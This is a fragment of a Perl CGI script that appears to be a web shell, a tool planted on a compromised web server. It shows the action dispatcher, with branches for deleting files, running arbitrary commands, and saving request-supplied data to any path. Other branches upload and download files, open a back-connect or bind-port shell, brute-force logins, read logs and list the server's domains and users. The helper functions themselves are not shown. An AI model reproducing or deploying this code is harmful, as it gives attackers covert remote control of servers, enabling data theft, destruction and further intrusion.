    if($remove ne "")
    {
        $rm = $CurrentDir.$PathSep.$remove;
        if(-d $rm)
        {
            &RmDir($rm);
        }else
        {
            if(unlink($rm))
            {
                print "<run> Done! </run><br>";
            }else
            {
                print "<run> Sorry! You dont have permissions! </run><br>";
            }          
        }
    }
    print &ListDir;

}
elsif($Action eq "command")                 # user wants to run a command
{
    &PrintPageHeader("c");
    print &ExecuteCommand;
}
elsif($Action eq "save")                    # user wants to save a file
{
    # 'data' and 'file' come straight from the request (see SaveFile)
    &PrintPageHeader;
    if(&SaveFile($in{'data'},$in{'file'}))
    {
        print "<run> Done! </run><br>";
    }else
    {
        print "<run> Sorry! You dont have permissions! </run><br>";
    }
    print &ListDir;
}
elsif($Action eq "upload")                  # user wants to upload a file
{
    &PrintPageHeader;

    print &UploadFile;
}
elsif($Action eq "backbind")                # user wants to back connect or bind port
{
    &PrintPageHeader("clientport");
    print &BackBind;
}
elsif($Action eq "bruteforcer")             # user wants to brute force
{
    &PrintPageHeader;
    print &BruteForcer;
}elsif($Action eq "download")               # user wants to download a file
{
    # no page header here: the file itself is the response body
    print &DownloadFile;
}elsif($Action eq "checklog")               # user wants to view log file
{
    &PrintPageHeader;
    print &ViewLog;

}elsif($Action eq "domainsuser")            # user wants to view list user/domain
{
    &PrintPageHeader;
    print &ViewDomainUser;
}elsif($Action eq "logout")                 # user wants to logout
{
    &PerformLogout;
}
&PrintPageFooter;